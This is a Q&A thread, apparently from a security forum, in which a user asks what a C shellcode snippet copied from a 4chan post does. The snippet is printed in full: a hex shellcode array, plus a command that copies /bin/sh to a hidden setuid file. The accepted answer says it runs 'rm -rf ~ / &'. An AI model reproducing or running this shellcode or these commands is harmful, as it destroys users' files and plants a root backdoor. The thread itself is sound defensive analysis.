# What does this potentially malicious code do?

Tags: malware, phishing

While reading a website called 4chan/b/ someone posted this code snippet, i was wondering what it does when executed? it appears to be C code, how harmful is it?

This is the full post:

```
Run a live system and try this:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
                                               release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
```

Would it be safe to test it in a sandbox?

Comment: As long as you don't have any toys in that Sandbox... this code "will destroy your home directory as a regular user, or all files if you are logged in as root."

Comment: I'm voting to close this question as off-topic because it should have been addressed to http://codereview.stackexchange.com/, in order to encourage future posters of similar questions to directly address them on the correct site.

Comment: @SteveDL, this question would not be on-topic at CR.

Answer (score 7, accepted):

The hex gibberish you see is [machine code](https://en.wikipedia.org/wiki/Machine_code).

Googling for that particular hex string reveals this [wiki page](http://ubuntuguide.org/wiki/Malicious_Linux_Commands).

According to the wiki, this actually runs:

```
rm -rf ~ / &
```

Yes, it's pretty harmful but it should be safe to run in a virtual machine, if you have a backup (or snapshot), under a non-privileged user, otherwise running it as a privileged user will erase your files

Comment: Depends on how you are accessing the box. If you're SSHing in, it will disable SSH

Comment: How would you decode this machine code if it weren't already been done somewhere on the Web?